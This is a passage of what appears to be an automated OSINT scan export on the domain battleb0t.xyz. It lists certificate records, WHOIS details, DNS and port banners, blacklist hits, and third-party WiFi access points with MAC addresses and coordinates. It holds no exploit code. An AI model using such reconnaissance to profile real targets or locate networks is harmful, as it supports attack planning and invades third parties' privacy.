u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | risk.ru (Category: hobby)
https://risk.ru/people/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:2D) | 32.8608, -79.9746 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 16 | 0 | 1 | 0 | None | 2606:4700:3031::6815:6a6 | ayhu.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery 5G (Net ID: 00:01:9F:3D:4F:6C) | 37.780462,-122.390564 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Iran | 87.248.157.102 |
| 2023-05-12 02:45:03 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | Russia | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.73): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5853301ea41251-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1232 (Net ID: 00:01:03:7C:2D:17) | 52.3759, 4.8975 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Font Awesome | pics.battleb0t.xyz |
| 2023-05-12 02:45:34 | Email Gateway (DNS MX Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | route2.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:41:58 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | domixo-hosting.de | domixo-hosting.de |
| 2023-05-12 02:50:28 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493005GJOH8HLL11157'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493005GJOH8HLL11157'}}}, u'attributes': {u'highlighting': u'<b>Go</b> <b>Daddy</b> Operating Company, <b>LLC</b>', u'value': u'Go Daddy Operating Company, LLC'}, u'type': u'autocompletions'}] | Go Daddy, LLC |
| 2023-05-12 02:44:21 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nwapi2.battleb0t.xyz |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00x44.github.io | 185.199.111.153 |
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a5:65:fa:d8:79:b7:aa:9f:cd:61:b9:6d:61:bb:
e3:07:27:16:d3:e1:46:58:db:ea:35:f8:26:d8:c8:
09:7e:b6:39:79:12:45:7f:4a:96:c2:65:47:bc:37:
b3:76:46:83:08:24:7b:32:63:f5:07:b6:17:66:20:
18:e4:18:8c:6e:16:7f:bc:81:ec:10:38:cc:20:6d:
2c:d6:29:65:3d:24:15:7a:78:2a:d0:43:3c:46:03:
10:b3:27:47:c6:2c:d9:37:1a:f8:11:aa:82:ad:00:
76:a7:88:0c:2b:f1:1a:b2:9a:95:76:c4:a9:4b:c3:
62:f9:12:87:35:9a:50:60:71:89:06:0b:f5:83:3f:
b3:37:8b:3d:cb:f9:c2:99:ee:99:d3:c8:08:07:e1:
c6:20:fc:1e:cb:95:74:f5:c1:74:33:8b:1b:39:2e:
63:89:98:62:bd:9a:c6:13:b2:b5:95:ec:cb:ee:ce:
27:e7:da:24:f1:8e:b6:e6:ab:e2:7a:20:63:e1:26:
ab:e8:05:03:30:6e:ae:59:d4:02:26:10:36:ee:3d:
2a:f4:c0:78:59:fa:77:cd:2a:88:bd:16:94:1a:e1:
c4:ca:d8:5b:b7:12:2e:db:10:0e:ec:94:77:40:49:
b3:6f:75:18:22:d3:cb:58:3c:44:d0:05:e2:db:a8:
00:c9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8a:d2:67:fd:ed:b1:23:72:f0:a2:4c:97:ee:c5:7e:e1:b0:
84:de:17:e3:7f:b0:fd:4c:e4:f5:d9:c1:87:4a:b8:32:d6:97:
13:2d:ab:c3:d8:0c:ce:60:02:7a:3d:d5:8b:4f:9b:89:37:1e:
07:e8:65:4f:13:db:bc:f2:3f:ba:ea:3a:b7:97:d8:a0:c0:4a:
65:8c:35:35:fd:69:77:08:6c:3c:bf:e2:a6:4a:02:ca:fc:ed:
e5:52:89:bc:c1:b6:61:98:79:3c:a3:31:8c:d6:1d:49:4c:6e:
4f:51:4b:80:2f:a3:0a:eb:fd:a0:1d:23:01:9e:b7:13:91:2e:
ea:39:a6:6a:a5:6e:65:a0:60:47:cf:fa:44:01:e4:af:f2:74:
c6:c0:9c:28:45:d7:eb:58:39:c7:39:24:41:f2:f3:e3:a3:aa:
8b:59:5c:05:a1:91:0e:a2:f0:b0:ab:cb:39:e8:59:97:1b:9f:
8d:d8:c2:47:ab:c2:d9:46:03:7a:5d:eb:fd:3e:65:0d:f9:fe:
dc:1b:a2:95:80:34:f0:64:f6:d6:5a:43:e4:2b:5f:53:8b:84:
65:53:97:2f:8f:bb:f4:1d:f8:10:82:18:da:d2:33:31:94:ea:
59:b0:de:49:31:a7:28:65:0c:5e:e7:fb:cf:58:f0:de:70:9b:
5c:67:53:d1
| ayhu.xyz |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | james-gamboa.github.io |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.23): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-8F90 (Net ID: 84:94:8C:33:8F:98) | 37.751, -97.822 |
| 2023-05-12 03:41:52 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SMB SMB 2.1 | 45.131.109.53 |
| 2023-05-12 02:46:00 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Chicago, Illinois, 60666, United States, North America | 172.67.168.252 |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | application/javascript;charset=utf-8 | https://battleb0t.xyz/main.built.js |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | downtown5 (Net ID: 00:01:E3:E9:56:90) | 50.1188, 8.6843 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | HubPages (Category: blog)
https://hubpages.com/@ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) | 37.7642, -122.3993 |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00ihsan.github.io]
https://www.openphish.com/feed.txt | 00ihsan.github.io |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.211 | 104.196.30.220 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | panel.battleb0t.xyz |
| 2023-05-12 02:54:54 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2a06:98c1:3121::1 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 119.48.229.35.bc.googleusercontent.com | 35.229.48.119 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00yongshiwangzi.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | APC (Net ID: 00:09:5B:4F:F1:CA) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:36 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:32:07.311 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:AA:9D:DE:C7:1A:03:CE:A4:C0:00:4F:
87:A8:C3:99:28:44:9B:D2:01:EB:31:A5:4D:CA:E6:87:
EC:A0:EC:55:A7:02:20:46:FF:BE:46:93:AD:B8:EF:FE:
25:F8:15:56:F7:DA:CF:93:CC:B6:57:60:7E:B3:1F:4E:
3D:D7:BC:FE:3F:5C:95
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:32:07.904 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:37:07:AC:16:A5:95:2E:57:A3:0B:B3:64:
CD:EA:6B:54:2E:81:8A:01:52:42:FF:1C:53:89:7A:D2:
6B:24:50:80:02:20:40:76:C6:34:39:4A:07:B1:8F:D5:
9F:21:37:77:6A:98:1B:06:80:4F:64:F6:8D:4F:C6:A8:
76:64:CB:D7:21:98
Signature Algorithm: sha256WithRSAEncryption
5a:91:30:6e:b9:53:94:e1:7e:bb:e0:98:45:df:78:b3:43:5d:
de:b7:e8:48:7b:6b:85:d8:3d:1f:0c:8e:55:6a:96:e0:1e:5a:
3f:a6:43:96:72:8b:0f:19:07:ee:9c:42:c7:4a:fa:00:d6:38:
45:8a:ea:1d:27:96:1c:3b:da:42:ff:fd:72:61:04:85:27:14:
44:a3:15:9a:66:dc:fe:95:f3:8c:98:0f:18:5b:f9:85:a2:67:
99:97:5a:de:6b:1e:8a:f6:0f:26:41:36:b4:b1:3e:27:57:59:
6e:d6:c4:ee:ce:b2:6c:21:fe:aa:fe:21:90:56:0b:ea:b9:fb:
42:2f:c1:77:37:3f:05:10:f5:44:c7:f2:f2:69:75:ed:35:ad:
bf:14:45:0f:8e:50:cc:75:c2:b4:48:82:8d:27:02:be:21:98:
49:ee:ec:f9:0b:27:d8:83:27:62:ad:0a:7b:66:8c:06:c8:72:
57:56:3c:6b:ac:63:49:11:4f:62:ea:70:01:53:cf:56:53:4b:
71:08:c9:75:ee:50:8f:d1:87:f6:68:91:33:35:2a:99:1f:6e:
f5:48:cb:c7:f5:99:a1:3f:39:b8:fe:33:3a:31:fe:e7:7d:d5:
4e:6f:92:4f:57:86:fc:b0:8f:23:98:3e:8f:91:f6:d5:3d:5c:
a6:e5:1c:71
|
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | United States | github.com |
| 2023-05-12 03:18:53 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://funny.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRBEACH (Net ID: 00:02:2D:8A:07:45) | 34.0544, -118.244 |
| 2023-05-12 03:00:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.50): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | apple network 3a656b (Net ID: 00:02:2D:05:9A:3A) | 34.0544, -118.244 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.26): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", 